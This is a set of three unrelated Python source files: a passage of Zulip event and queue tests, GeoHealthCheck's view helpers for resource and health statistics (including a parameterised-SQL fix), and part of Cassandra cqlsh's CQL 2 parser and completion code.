                ('stream_id', check_int),
                ('subscribers', check_list(check_int)),
            ])
        )
        add_schema_checker = check_dict([
            ('type', equals('subscription')),
            ('op', equals('add')),
            ('subscriptions', subscription_schema_checker),
        ])
        remove_schema_checker = check_dict([
            ('type', equals('subscription')),
            ('op', equals('remove')),
            ('subscriptions', check_list(
                check_dict([
                    ('name', equals('test_stream')),
                    ('stream_id', check_int),
                ]),
            )),
        ])
        peer_add_schema_checker = check_dict([
            ('type', equals('subscription')),
            ('op', equals('peer_add')),
            ('user_id', check_int),
            ('subscriptions', check_list(check_string)),
        ])
        peer_remove_schema_checker = check_dict([
            ('type', equals('subscription')),
            ('op', equals('peer_remove')),
            ('user_id', check_int),
            ('subscriptions', check_list(check_string)),
        ])
        stream_update_schema_checker = check_dict([
            ('type', equals('stream')),
            ('op', equals('update')),
            ('property', equals('description')),
            ('value', check_string),
            ('name', check_string),
        ])
        # Subscribing ourselves produces a subscription/add event.
        action = lambda: self.subscribe_to_stream("hamlet@zulip.com", "test_stream") # type: Callable
        events = self.do_test(action, event_types=["subscription", "realm_user"])
        error = add_schema_checker('events[0]', events[0])
        self.assert_on_error(error)
        # Another user subscribing produces a peer_add event for us.
        action = lambda: self.subscribe_to_stream("othello@zulip.com", "test_stream")
        events = self.do_test(action)
        error = peer_add_schema_checker('events[0]', events[0])
        self.assert_on_error(error)
        stream = get_stream("test_stream", self.user_profile.realm)
        action = lambda: bulk_remove_subscriptions(
            [get_user_profile_by_email("othello@zulip.com")],
            [stream])
        events = self.do_test(action)
        error = peer_remove_schema_checker('events[0]', events[0])
        self.assert_on_error(error)
        action = lambda: bulk_remove_subscriptions(
            [get_user_profile_by_email("hamlet@zulip.com")],
            [stream])
        events = self.do_test(action)
        error = remove_schema_checker('events[1]', events[1])
        self.assert_on_error(error)
        action = lambda: self.subscribe_to_stream("hamlet@zulip.com", "test_stream")
        events = self.do_test(action)
        error = add_schema_checker('events[1]', events[1])
        self.assert_on_error(error)
        action = lambda: do_change_stream_description(get_realm('zulip'), 'test_stream', u'new description')
        events = self.do_test(action)
        error = stream_update_schema_checker('events[0]', events[0])
        self.assert_on_error(error)
class FetchInitialStateDataTest(ZulipTestCase):
    """Checks that fetch_initial_state_data exposes realm_bots by role."""

    def test_realm_bots_non_admin(self):
        # type: () -> None
        # Non-admin users don't have access to all bots
        profile = get_user_profile_by_email('cordelia@zulip.com')
        self.assertFalse(profile.is_realm_admin)
        state = fetch_initial_state_data(profile, None, "")
        self.assert_length(state['realm_bots'], 0)

        # additionally the API key for a random bot is not present in the data
        bot_key = get_user_profile_by_email('notification-bot@zulip.com').api_key
        self.assertNotIn(bot_key, str(state))

    def test_realm_bots_admin(self):
        # type: () -> None
        # Admin users have access to all bots in the realm_bots field
        profile = get_user_profile_by_email('hamlet@zulip.com')
        do_change_is_admin(profile, True)
        self.assertTrue(profile.is_realm_admin)
        state = fetch_initial_state_data(profile, None, "")
        self.assertTrue(len(state['realm_bots']) > 5)
class EventQueueTest(TestCase):
    """Unit tests for EventQueue push/collapse semantics."""

    def test_one_event(self):
        # type: () -> None
        q = EventQueue("1")
        q.push({"type": "pointer", "pointer": 1, "timestamp": "1"})
        self.assertFalse(q.empty())
        self.assertEqual(
            q.contents(),
            [{"id": 0, "type": "pointer", "pointer": 1, "timestamp": "1"}])

    def test_event_collapsing(self):
        # type: () -> None
        # consecutive pointer events collapse down to the newest one
        q = EventQueue("1")
        for n in range(1, 10):
            q.push({"type": "pointer", "pointer": n, "timestamp": str(n)})
        self.assertEqual(
            q.contents(),
            [{"id": 8, "type": "pointer", "pointer": 9, "timestamp": "9"}])

        # unknown/restart events interrupt collapsing runs
        q = EventQueue("2")
        for n in range(1, 10):
            q.push({"type": "pointer", "pointer": n, "timestamp": str(n)})
        q.push({"type": "unknown"})
        q.push({"type": "restart", "server_generation": "1"})
        for n in range(11, 20):
            q.push({"type": "pointer", "pointer": n, "timestamp": str(n)})
        q.push({"type": "restart", "server_generation": "2"})
        self.assertEqual(
            q.contents(),
            [{"id": 9, "type": "unknown"},
             {"id": 19, "type": "pointer", "pointer": 19, "timestamp": "19"},
             {"id": 20, "type": "restart", "server_generation": "2"}])

        for n in range(21, 23):
            q.push({"type": "pointer", "pointer": n, "timestamp": str(n)})
        self.assertEqual(
            q.contents(),
            [{"id": 9, "type": "unknown"},
             {"id": 19, "type": "pointer", "pointer": 19, "timestamp": "19"},
             {"id": 20, "type": "restart", "server_generation": "2"},
             {"id": 22, "type": "pointer", "pointer": 22, "timestamp": "22"}])

    def test_flag_add_collapsing(self):
        # type: () -> None
        # successive flag-add events merge their message id lists
        q = EventQueue("1")
        q.push({"type": "update_message_flags", "flag": "read",
                "operation": "add", "all": False,
                "messages": [1, 2, 3, 4], "timestamp": "1"})
        q.push({"type": "update_message_flags", "flag": "read",
                "all": False, "operation": "add",
                "messages": [5, 6], "timestamp": "1"})
        self.assertEqual(
            q.contents(),
            [{"id": 1, "type": "update_message_flags", "all": False,
              "flag": "read", "operation": "add",
              "messages": [1, 2, 3, 4, 5, 6], "timestamp": "1"}])

    def test_flag_remove_collapsing(self):
        # type: () -> None
        # successive flag-remove events merge their message id lists
        q = EventQueue("1")
        q.push({"type": "update_message_flags", "flag": "collapsed",
                "operation": "remove", "all": False,
                "messages": [1, 2, 3, 4], "timestamp": "1"})
        q.push({"type": "update_message_flags", "flag": "collapsed",
                "all": False, "operation": "remove",
                "messages": [5, 6], "timestamp": "1"})
        self.assertEqual(
            q.contents(),
            [{"id": 1, "type": "update_message_flags", "all": False,
              "flag": "collapsed", "operation": "remove",
              "messages": [1, 2, 3, 4, 5, 6], "timestamp": "1"}])

    def test_collapse_event(self):
        # type: () -> None
        # events of different types do not collapse into each other
        q = EventQueue("1")
        q.push({"type": "pointer", "pointer": 1, "timestamp": "1"})
        q.push({"type": "unknown", "timestamp": "1"})
        self.assertEqual(
            q.contents(),
            [{"id": 0, "type": "pointer", "pointer": 1, "timestamp": "1"},
             {"id": 1, "type": "unknown", "timestamp": "1"}])
class TestEventsRegisterAllPublicStreamsDefaults(TestCase):
    """_default_all_public_streams: an explicit argument always wins; the
    profile's stored default is only used when None is passed."""

    def setUp(self):
        # type: () -> None
        self.email = 'hamlet@zulip.com'
        self.user_profile = get_user_profile_by_email(self.email)

    def _set_default(self, value):
        # persist the user's default_all_public_streams flag
        self.user_profile.default_all_public_streams = value
        self.user_profile.save()

    def test_use_passed_all_public_true_default_false(self):
        # type: () -> None
        self._set_default(False)
        self.assertTrue(_default_all_public_streams(self.user_profile, True))

    def test_use_passed_all_public_true_default(self):
        # type: () -> None
        self._set_default(True)
        self.assertTrue(_default_all_public_streams(self.user_profile, True))

    def test_use_passed_all_public_false_default_false(self):
        # type: () -> None
        self._set_default(False)
        self.assertFalse(_default_all_public_streams(self.user_profile, False))

    def test_use_passed_all_public_false_default_true(self):
        # type: () -> None
        self._set_default(True)
        self.assertFalse(_default_all_public_streams(self.user_profile, False))

    def test_use_true_default_for_none(self):
        # type: () -> None
        self._set_default(True)
        self.assertTrue(_default_all_public_streams(self.user_profile, None))

    def test_use_false_default_for_none(self):
        # type: () -> None
        self._set_default(False)
        self.assertFalse(_default_all_public_streams(self.user_profile, None))
class TestEventsRegisterNarrowDefaults(TestCase):
    """_default_narrow: a non-empty narrow always wins; an empty narrow
    falls back to the profile's default events-register stream, if any."""

    def setUp(self):
        # type: () -> None
        self.email = 'hamlet@zulip.com'
        self.user_profile = get_user_profile_by_email(self.email)
        self.stream = get_stream('Verona', self.user_profile.realm)

    def _set_default_stream_id(self, stream_id):
        # persist the user's default_events_register_stream_id
        self.user_profile.default_events_register_stream_id = stream_id
        self.user_profile.save()

    def test_use_passed_narrow_no_default(self):
        # type: () -> None
        self._set_default_stream_id(None)
        narrow = _default_narrow(self.user_profile, [[u'stream', u'my_stream']])
        self.assertEqual(narrow, [[u'stream', u'my_stream']])

    def test_use_passed_narrow_with_default(self):
        # type: () -> None
        self._set_default_stream_id(self.stream.id)
        narrow = _default_narrow(self.user_profile, [[u'stream', u'my_stream']])
        self.assertEqual(narrow, [[u'stream', u'my_stream']])

    def test_use_default_if_narrow_is_empty(self):
        # type: () -> None
        self._set_default_stream_id(self.stream.id)
        self.assertEqual(_default_narrow(self.user_profile, []),
                         [[u'stream', u'Verona']])

    def test_use_narrow_if_default_is_none(self):
        # type: () -> None
        self._set_default_stream_id(None)
        self.assertEqual(_default_narrow(self.user_profile, []), [])
| |
# =================================================================
#
# Authors: Tom Kralidis <tomkralidis@gmail.com>
#
# Copyright (c) 2014 Tom Kralidis
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import logging
import models
import util
from sqlalchemy import text
from plugin import Plugin
from factory import Factory
from init import App
# Flask application singleton and module-level logger shared by the helpers below.
APP = App.get_app()
LOGGER = logging.getLogger(__name__)
def list_resources(resource_type=None, query=None, tag=None):
    """Return all Resources plus aggregate run/reliability statistics.

    :param resource_type: optional resource type filter (e.g. 'OGC:WMS')
    :param query: optional 'facet:term' search string (see get_query_field_term)
    :param tag: optional tag name to filter on
    :returns: dict with 'resources', 'total', 'success', 'fail',
              'first_run', 'last_run' and 'reliability' keys
    """
    reliability_values = []
    first_run = None
    last_run = None
    response = {
        'total': 0,
        'success': {
            'number': 0,
            'percentage': 0
        },
        'fail': {
            'number': 0,
            'percentage': 0
        },
        'first_run': None,
        'last_run': None,
        'reliability': 0
    }

    filters = ()
    if resource_type is not None:
        # SECURITY FIX: use a bound parameter instead of interpolating the
        # request-supplied resource_type into raw SQL (injection risk)
        filters = filters + (
            text("resource_type = :rtype").bindparams(rtype=resource_type),)
    if query is not None:
        field, term = get_query_field_term(query)
        filters = filters + (field.ilike(term),)
    if tag is not None:
        tag_filter = (models.Resource.tags.any(models.Tag.name.in_([tag])),)
        filters = filters + tag_filter

    response['resources'] = models.Resource.query.filter(*filters).all()
    response['total'] = len(response['resources'])

    for resource in response['resources']:
        if resource.run_count > 0:
            # View should work even without Runs
            if first_run is None or resource.first_run < first_run:
                first_run = resource.first_run
            # BUGFIX: track the most recent run; the original used '<' here,
            # which kept the OLDEST run as 'last_run'.
            # NOTE(review): assumes Run instances order by run time -- confirm
            # against models.Run comparison behavior.
            if last_run is None or resource.last_run > last_run:
                last_run = resource.last_run
            if resource.last_run.success:
                response['success']['number'] += 1
            else:
                response['fail']['number'] += 1
            reliability_values.append(resource.reliability)

    # hoisted out of the loop: only the final values matter
    response['first_run'] = first_run
    response['last_run'] = last_run
    response['success']['percentage'] = int(round(util.percentage(
        response['success']['number'], response['total'])))
    response['fail']['percentage'] = 100 - response['success']['percentage']
    response['reliability'] = round(util.average(reliability_values), 1)
    return response
def get_resource_by_id(identifier):
    """Fetch a single Resource by its identifier; 404s when absent."""
    query = models.Resource.query.filter_by(identifier=identifier)
    return query.first_or_404()
def get_run_by_id(identifier):
    """Fetch a single Run by its identifier; 404s when absent."""
    query = models.Run.query.filter_by(identifier=identifier)
    return query.first_or_404()
def get_run_by_resource_id(identifier):
    """return query of all Runs for the given Resource identifier"""
    # (docstring fixed: this returns an unevaluated query over many Runs,
    # not a single Run -- the previous text was copy-pasted from above)
    return models.Run.query.filter_by(
        resource_identifier=identifier)
def get_resource_types_counts():
    """return frequency counts of registered resource types"""
    # models returns a (counts, total) pair; expose it as a dict
    mrt = models.get_resource_types_counts()
    return {
        'counts': mrt[0],
        'total': mrt[1],
    }
def get_health_summary():
    """return summary of all runs

    Builds a site-wide health dict: overall run reliability plus the
    number/percentage of resources whose latest run failed, including
    the failing Resource objects themselves.
    """

    # For overall reliability
    # NOTE(review): with an empty database total_runs (and total_resources
    # below) is 0 -- confirm util.percentage guards against division by zero.
    total_runs = models.get_runs_count()
    failed_runs = models.get_runs_status_count(False)
    success_runs = total_runs - failed_runs

    # Resources status derived from last N runs
    total_resources = models.get_resources_count()
    last_runs = models.get_last_run_per_resource()
    failed = 0
    failed_resources = []
    for run in last_runs:
        if not run.success:
            # collect the full Resource for each currently-failing run
            failed_resources.append(
                get_resource_by_id(run.resource_identifier))
            failed += 1
    success = total_resources - failed
    failed_percentage = int(round(
        util.percentage(failed, total_resources)))
    success_percentage = 100 - failed_percentage
    response = {
        'site_url': APP.config['GHC_SITE_URL'],
        'total': total_resources,
        'success': {
            'number': success,
            'percentage': success_percentage
        },
        'fail': {
            'number': failed,
            'percentage': failed_percentage
        },
        'first_run': models.get_first_run(),
        'last_run': models.get_last_run(),
        'reliability': round(util.percentage(success_runs, total_runs), 1),
        'failed_resources': failed_resources
    }
    return response
def get_tag_counts():
    """return all tag counts"""
    # thin passthrough to the models layer
    return models.get_tag_counts()
def get_query_field_term(query):
    """Map a q= search string to a [field, ILIKE pattern] pair.

    Recognizes 'facet:term' queries for the url/title/site/owner facets;
    anything else becomes a substring search on the resource title.
    """
    field = models.Resource.title  # default
    try:
        facet, term = query.split(':')
    except ValueError:
        # not a single 'facet:term' pair: plain title substring search
        return [field, '%%%s%%' % query]

    pattern = '%%%s%%' % term  # default like
    if facet == 'url':
        field = models.Resource.url
    elif facet == 'title':
        field = models.Resource.title
    elif facet == 'site':
        # match any URL under the given site prefix
        field = models.Resource.url
        pattern = '%%%s/%%' % term
    elif facet == 'owner':
        field = models.Resource.owner_identifier
    return [field, pattern]
def get_probes_avail(resource_type=None, resource=None):
    """
    Get all available Probes with their attributes.
    :param resource_type: optional resource type e.g. OGC:WMS
    :param resource: optional Resource instance
    :return: dict mapping probe class name to its plugin-vars dict
    """
    # Assume no resource type
    filters = None
    if resource_type:
        # match Probes declared for this exact type or the '*:*' wildcard
        filters = [('RESOURCE_TYPE', resource_type),
                   ('RESOURCE_TYPE', '*:*')]

    probe_classes = Plugin.get_plugins('GeoHealthCheck.probe.Probe', filters)

    result = dict()
    for probe_class in probe_classes:
        probe = Factory.create_obj(probe_class)
        if probe:
            if resource:
                # best-effort: expand per-resource parameter defaults;
                # a failure is logged but the Probe is still listed
                try:
                    probe._resource = resource
                    probe.expand_params(resource)
                except Exception as err:
                    msg = 'Cannot expand plugin vars for %s err=%s' \
                          % (probe_class, repr(err))
                    LOGGER.warning(msg)
            result[probe_class] = probe.get_plugin_vars()
    return result
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# code for dealing with CQL's syntax, rules, interpretation
# i.e., stuff that's not necessarily cqlsh-specific
import re
import traceback
from . import pylexotron, util, helptopics
from cql import cqltypes
# Convenience alias for completion hints produced by the lexer framework.
Hint = pylexotron.Hint

# Keyspaces reserved by Cassandra itself.
SYSTEM_KEYSPACES = ('system',)

# Help-topic lookup used by cqlsh's HELP command (CQL 2 flavor).
cqldocs = helptopics.CQL2HelpTopics()
class CqlParsingRuleSet(pylexotron.ParsingRuleSet):
    """CQL 2 grammar, token massaging and tab-completion support for cqlsh.

    Extends pylexotron's ParsingRuleSet: grammar productions are appended
    as text (see the module-level syntax_rules strings) and completion
    callbacks are registered per (rule, symbol) via completer_for().
    """

    # reserved words; set_keywords_as_syntax() turns each into a <K_FOO> terminal
    keywords = set((
        'select', 'from', 'where', 'and', 'key', 'insert', 'update', 'with',
        'limit', 'using', 'consistency', 'one', 'quorum', 'all', 'any',
        'local_quorum', 'each_quorum', 'two', 'three', 'use', 'count', 'set',
        'begin', 'apply', 'batch', 'truncate', 'delete', 'in', 'create',
        'keyspace', 'schema', 'columnfamily', 'table', 'index', 'on', 'drop',
        'primary', 'into', 'values', 'timestamp', 'ttl', 'alter', 'add', 'type',
        'first', 'reversed'
    ))

    columnfamily_options = (
        # (CQL option name, Thrift option name (or None if same))
        ('comment', None),
        ('comparator', 'comparator_type'),
        ('read_repair_chance', None),
        ('gc_grace_seconds', None),
        ('default_validation', 'default_validation_class'),
        ('min_compaction_threshold', None),
        ('max_compaction_threshold', None),
        ('replicate_on_write', None),
        ('compaction_strategy_class', 'compaction_strategy'),
        ('populate_io_cache_on_flush', None),
    )

    # still accepted in syntax for backward compatibility
    obsolete_cf_options = (
        ('key_cache_size', None),
        ('row_cache_size', None),
        ('row_cache_save_period_in_seconds', None),
        ('key_cache_save_period_in_seconds', None),
        ('memtable_throughput_in_mb', None),
        ('memtable_operations_in_millions', None),
        ('memtable_flush_after_mins', None),
        ('row_cache_provider', None),
    )

    all_columnfamily_options = columnfamily_options + obsolete_cf_options

    # (CQL option name, Thrift option name (or None if same), known sub-keys)
    columnfamily_map_options = (
        ('compaction_strategy_options', None,
            ()),
        ('compression_parameters', 'compression_options',
            ('sstable_compression', 'chunk_length_kb', 'crc_check_chance')),
    )

    available_compression_classes = (
        'DeflateCompressor',
        'SnappyCompressor',
    )

    available_compaction_classes = (
        'LeveledCompactionStrategy',
        'SizeTieredCompactionStrategy'
    )

    replication_strategies = (
        'SimpleStrategy',
        'OldNetworkTopologyStrategy',
        'NetworkTopologyStrategy'
    )

    # strategies that accept a replication_factor option
    replication_factor_strategies = (
        'SimpleStrategy',
        'org.apache.cassandra.locator.SimpleStrategy',
        'OldNetworkTopologyStrategy',
        'org.apache.cassandra.locator.OldNetworkTopologyStrategy'
    )

    consistency_levels = (
        'ANY',
        'ONE',
        'TWO',
        'THREE',
        'QUORUM',
        'ALL',
        'LOCAL_QUORUM',
        'EACH_QUORUM'
    )

    # if a term matches this, it shouldn't need to be quoted to be valid cql
    valid_cql_word_re = re.compile(r"^(?:[a-z][a-z0-9_]*|-?[0-9][0-9.]*)$", re.I)

    def __init__(self, *args, **kwargs):
        """Initialize the rule set and install the keyword terminals."""
        pylexotron.ParsingRuleSet.__init__(self, *args, **kwargs)
        # note: commands_end_with_newline may be extended by callers.
        self.commands_end_with_newline = set()
        self.set_keywords_as_syntax()

    def completer_for(self, rulename, symname):
        """Decorator factory: register the decorated function as the
        completer for symname within rulename.

        The wrapper only invokes the completer when a live cassandra
        connection is bound in the parse context; otherwise it offers
        no candidates.
        """
        def registrator(f):
            def completerwrapper(ctxt):
                cass = ctxt.get_binding('cassandra_conn', None)
                if cass is None:
                    return ()
                return f(ctxt, cass)
            completerwrapper.func_name = 'completerwrapper_on_' + f.func_name
            self.register_completer(completerwrapper, rulename, symname)
            return completerwrapper
        return registrator

    def explain_completion(self, rulename, symname, explanation=None):
        """Register a completer that only shows a hint (default '<symname>')."""
        if explanation is None:
            explanation = '<%s>' % (symname,)
        @self.completer_for(rulename, symname)
        def explainer(ctxt, cass):
            return [Hint(explanation)]
        return explainer

    def set_keywords_as_syntax(self):
        """Append a '<K_FOO> ::= "foo" ;' production for every keyword."""
        syntax = []
        for k in self.keywords:
            syntax.append('<K_%s> ::= "%s" ;' % (k.upper(), k))
        self.append_rules('\n'.join(syntax))

    def cql_massage_tokens(self, toklist):
        """Post-process lexer output: drop 'endline' tokens, except that a
        newline terminates the current statement (becomes an 'endtoken')
        when the statement's command word is in commands_end_with_newline."""
        curstmt = []
        output = []

        term_on_nl = False

        for t in toklist:
            if t[0] == 'endline':
                if term_on_nl:
                    t = ('endtoken',) + t[1:]
                else:
                    # don't put any 'endline' tokens in output
                    continue
            curstmt.append(t)
            if t[0] == 'endtoken':
                term_on_nl = False
                output.extend(curstmt)
                curstmt = []
            else:
                if len(curstmt) == 1:
                    # first token in statement; command word
                    cmd = t[1].lower()
                    term_on_nl = bool(cmd in self.commands_end_with_newline)

        output.extend(curstmt)
        return output

    def cql_parse(self, text, startsymbol='Start'):
        """Lex, massage and parse text starting from startsymbol."""
        tokens = self.lex(text)
        tokens = self.cql_massage_tokens(tokens)
        return self.parse(startsymbol, tokens, init_bindings={'*SRC*': text})

    def cql_whole_parse_tokens(self, toklist, srcstr=None, startsymbol='Start'):
        """Require toklist to match startsymbol in its entirety."""
        return self.whole_match(startsymbol, toklist, srcstr=srcstr)

    def cql_split_statements(self, text):
        """Split text into per-statement token lists.

        BEGIN BATCH ... APPLY BATCH groups are merged into one statement.
        Returns (statements, in_batch) where in_batch says whether the
        text ends inside an unfinished batch.
        """
        tokens = self.lex(text)
        tokens = self.cql_massage_tokens(tokens)
        stmts = util.split_list(tokens, lambda t: t[0] == 'endtoken')
        output = []
        in_batch = False
        for stmt in stmts:
            if in_batch:
                output[-1].extend(stmt)
            else:
                output.append(stmt)
            if len(stmt) > 2:
                # a trailing 'APPLY BATCH ;' closes the open batch
                if stmt[-3][0] == 'K_APPLY':
                    in_batch = False
                elif stmt[0][0] == 'K_BEGIN':
                    in_batch = True
        return output, in_batch

    def cql_complete_single(self, text, partial, init_bindings={}, ignore_case=True,
                            startsymbol='Start'):
        """Produce (candidates, hints) for completing `partial` at the end
        of `text`.

        NOTE: the mutable default for init_bindings is harmless here --
        it is only read (copied), never mutated.
        """
        tokens = (self.cql_split_statements(text)[0] or [[]])[-1]
        bindings = init_bindings.copy()

        # handle some different completion scenarios- in particular, completing
        # inside a string literal
        prefix = None
        dequoter = util.identity
        lasttype = None
        if tokens:
            lasttype = tokens[-1][0]
            if lasttype == 'unclosedString':
                prefix = self.token_dequote(tokens[-1])
                tokens = tokens[:-1]
                partial = prefix + partial
                dequoter = self.dequote_value
                requoter = self.escape_value
            elif lasttype == 'unclosedName':
                prefix = self.token_dequote(tokens[-1])
                tokens = tokens[:-1]
                partial = prefix + partial
                dequoter = self.dequote_name
                requoter = self.escape_name
            elif lasttype == 'unclosedComment':
                return []
        bindings['partial'] = partial
        bindings['*LASTTYPE*'] = lasttype
        bindings['*SRC*'] = text

        # find completions for the position
        completions = self.complete(startsymbol, tokens, bindings)

        hints, strcompletes = util.list_bifilter(pylexotron.is_hint, completions)

        # it's possible to get a newline token from completion; of course, we
        # don't want to actually have that be a candidate, we just want to hint
        if '\n' in strcompletes:
            strcompletes.remove('\n')
            if partial == '':
                hints.append(Hint('<enter>'))

        # find matches with the partial word under completion
        if ignore_case:
            partial = partial.lower()
            f = lambda s: s and dequoter(s).lower().startswith(partial)
        else:
            f = lambda s: s and dequoter(s).startswith(partial)
        candidates = filter(f, strcompletes)

        if prefix is not None:
            # dequote, re-escape, strip quotes: gets us the right quoted text
            # for completion. the opening quote is already there on the command
            # line and not part of the word under completion, and readline
            # fills in the closing quote for us.
            candidates = [requoter(dequoter(c))[len(prefix)+1:-1] for c in candidates]

            # the above process can result in an empty string; this doesn't help for
            # completions
            candidates = filter(None, candidates)

        # prefix a space when desirable for pleasant cql formatting
        if tokens:
            newcandidates = []
            for c in candidates:
                if self.want_space_between(tokens[-1], c) \
                        and prefix is None \
                        and not text[-1].isspace() \
                        and not c[0].isspace():
                    c = ' ' + c
                newcandidates.append(c)
            candidates = newcandidates

        # append a space for single, complete identifiers
        if len(candidates) == 1 and candidates[0][-1].isalnum() \
                and lasttype != 'unclosedString' \
                and lasttype != 'unclosedName':
            candidates[0] += ' '
        return candidates, hints

    @staticmethod
    def want_space_between(tok, following):
        """Heuristic: should a space separate token tok from the completion?"""
        if following in (',', ')', ':'):
            return False
        if tok[0] == 'op' and tok[1] in (',', ')', '='):
            return True
        if tok[0] == 'stringLiteral' and following[0] != ';':
            return True
        if tok[0] == 'star' and following[0] != ')':
            return True
        if tok[0] == 'endtoken':
            return True
        if tok[1][-1].isalnum() and following[0] != ',':
            return True
        return False

    def cql_complete(self, text, partial, cassandra_conn=None, ignore_case=True, debug=False,
                     startsymbol='Start'):
        """Top-level completion entry point: return hints plus candidates,
        expanding a single unambiguous candidate as far as possible."""
        init_bindings = {'cassandra_conn': cassandra_conn}
        if debug:
            init_bindings['*DEBUG*'] = True
            print "cql_complete(%r, partial=%r)" % (text, partial)

        completions, hints = self.cql_complete_single(text, partial, init_bindings,
                                                      startsymbol=startsymbol)

        if hints:
            hints = [h.text for h in hints]
            hints.append('')

        if len(completions) == 1 and len(hints) == 0:
            c = completions[0]
            if debug:
                print "** Got one completion: %r. Checking for further matches...\n" % (c,)
            if not c.isspace():
                new_c = self.cql_complete_multiple(text, c, init_bindings, startsymbol=startsymbol)
                completions = [new_c]
            if debug:
                print "** New list of completions: %r" % (completions,)

        return hints + completions

    def cql_complete_multiple(self, text, first, init_bindings, startsymbol='Start'):
        """Greedily extend completion `first` while it remains unambiguous."""
        debug = init_bindings.get('*DEBUG*', False)
        try:
            completions, hints = self.cql_complete_single(text + first, '', init_bindings,
                                                          startsymbol=startsymbol)
        except Exception:
            # never let completion expansion break the prompt
            if debug:
                print "** completion expansion had a problem:"
                traceback.print_exc()
            return first
        if hints:
            if not first[-1].isspace():
                first += ' '
            if debug:
                print "** completion expansion found hints: %r" % (hints,)
            return first
        if len(completions) == 1 and completions[0] != '':
            if debug:
                print "** Got another completion: %r." % (completions[0],)
            if completions[0][0] in (',', ')', ':') and first[-1] == ' ':
                first = first[:-1]
            first += completions[0]
        else:
            common_prefix = util.find_common_prefix(completions)
            if common_prefix == '':
                return first
            if common_prefix[0] in (',', ')', ':') and first[-1] == ' ':
                first = first[:-1]
            if debug:
                print "** Got a partial completion: %r." % (common_prefix,)
            first += common_prefix
        if debug:
            print "** New total completion: %r. Checking for further matches...\n" % (first,)
        return self.cql_complete_multiple(text, first, init_bindings, startsymbol=startsymbol)

    @classmethod
    def is_valid_cql_word(cls, s):
        """True when s may appear unquoted in CQL."""
        return cls.valid_cql_word_re.match(s) is not None and s.lower() not in cls.keywords

    @staticmethod
    def cql_extract_orig(toklist, srcstr):
        # low end of span for first token, to high end of span for last token
        return srcstr[toklist[0][2][0]:toklist[-1][2][1]]

    @staticmethod
    def token_dequote(tok):
        """Return the unquoted text of a (possibly unterminated) token."""
        if tok[0] == 'stringLiteral':
            # strip quotes
            return tok[1][1:-1].replace("''", "'")
        if tok[0] == 'unclosedString':
            # strip one quote
            return tok[1][1:].replace("''", "'")
        if tok[0] == 'unclosedComment':
            return ''
        return tok[1]

    @staticmethod
    def token_is_word(tok):
        return tok[0] == 'identifier'

    @classmethod
    def cql2_maybe_escape_name(cls, name):
        """Quote name only when CQL 2 requires it."""
        if cls.is_valid_cql_word(name):
            return name
        return cls.cql2_escape_name(name)

    # XXX: this doesn't really belong here.
    @classmethod
    def is_counter_col(cls, cfdef, colname):
        """True when colname is a counter column in cfdef."""
        col_info = [cm for cm in cfdef.column_metadata if cm.name == colname]
        return bool(col_info and cqltypes.is_counter_type(col_info[0].validation_class))

    @staticmethod
    def cql2_dequote_value(cqlword):
        """Strip surrounding single quotes and unescape doubled quotes."""
        cqlword = cqlword.strip()
        if cqlword == '':
            return cqlword
        if cqlword[0] == "'" and cqlword[-1] == "'":
            cqlword = cqlword[1:-1].replace("''", "'")
        return cqlword

    @staticmethod
    def cql2_escape_value(value):
        """Render a python value as a CQL 2 literal."""
        if value is None:
            return 'NULL' # this totally won't work
        if isinstance(value, bool):
            value = str(value).lower()
        elif isinstance(value, float):
            return '%f' % value
        elif isinstance(value, int):
            return str(value)
        return "'%s'" % value.replace("'", "''")

    # use _name for keyspace, cf, and column names, and _value otherwise.
    # also use the cql2_ prefix when dealing with cql2, or leave it off to
    # get whatever behavior is default for this CqlParsingRuleSet.
    cql2_dequote_name = dequote_name = dequote_value = cql2_dequote_value
    cql2_escape_name = escape_name = escape_value = cql2_escape_value
    maybe_escape_name = cql2_maybe_escape_name
    dequote_any = cql2_dequote_value
# Singleton rule set used by all completer registrations below.
CqlRuleSet = CqlParsingRuleSet()

# convenience for remainder of module
shorthands = ('completer_for', 'explain_completion',
              'dequote_value', 'dequote_name',
              'escape_value', 'escape_name',
              'maybe_escape_name')

# Re-export selected bound methods as module-level names so the decorators
# below can be used without the CqlRuleSet. prefix.
for shorthand in shorthands:
    globals()[shorthand] = getattr(CqlRuleSet, shorthand)
# BEGIN SYNTAX/COMPLETION RULE DEFINITIONS
syntax_rules = r'''
<Start> ::= <CQL_Statement>*
;
<CQL_Statement> ::= [statements]=<statementBody> ";"
;
# the order of these terminal productions is significant:
<endline> ::= /\n/ ;
JUNK ::= /([ \t\r\f\v]+|(--|[/][/])[^\n\r]*([\n\r]|$)|[/][*].*?[*][/])/ ;
<stringLiteral> ::= /'([^']|'')*'/ ;
<float> ::= /-?[0-9]+\.[0-9]+/ ;
<integer> ::= /-?[0-9]+/ ;
<uuid> ::= /[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/ ;
<identifier> ::= /[a-z][a-z0-9_]*/ ;
<colon> ::= ":" ;
<star> ::= "*" ;
<range> ::= ".." ;
<endtoken> ::= ";" ;
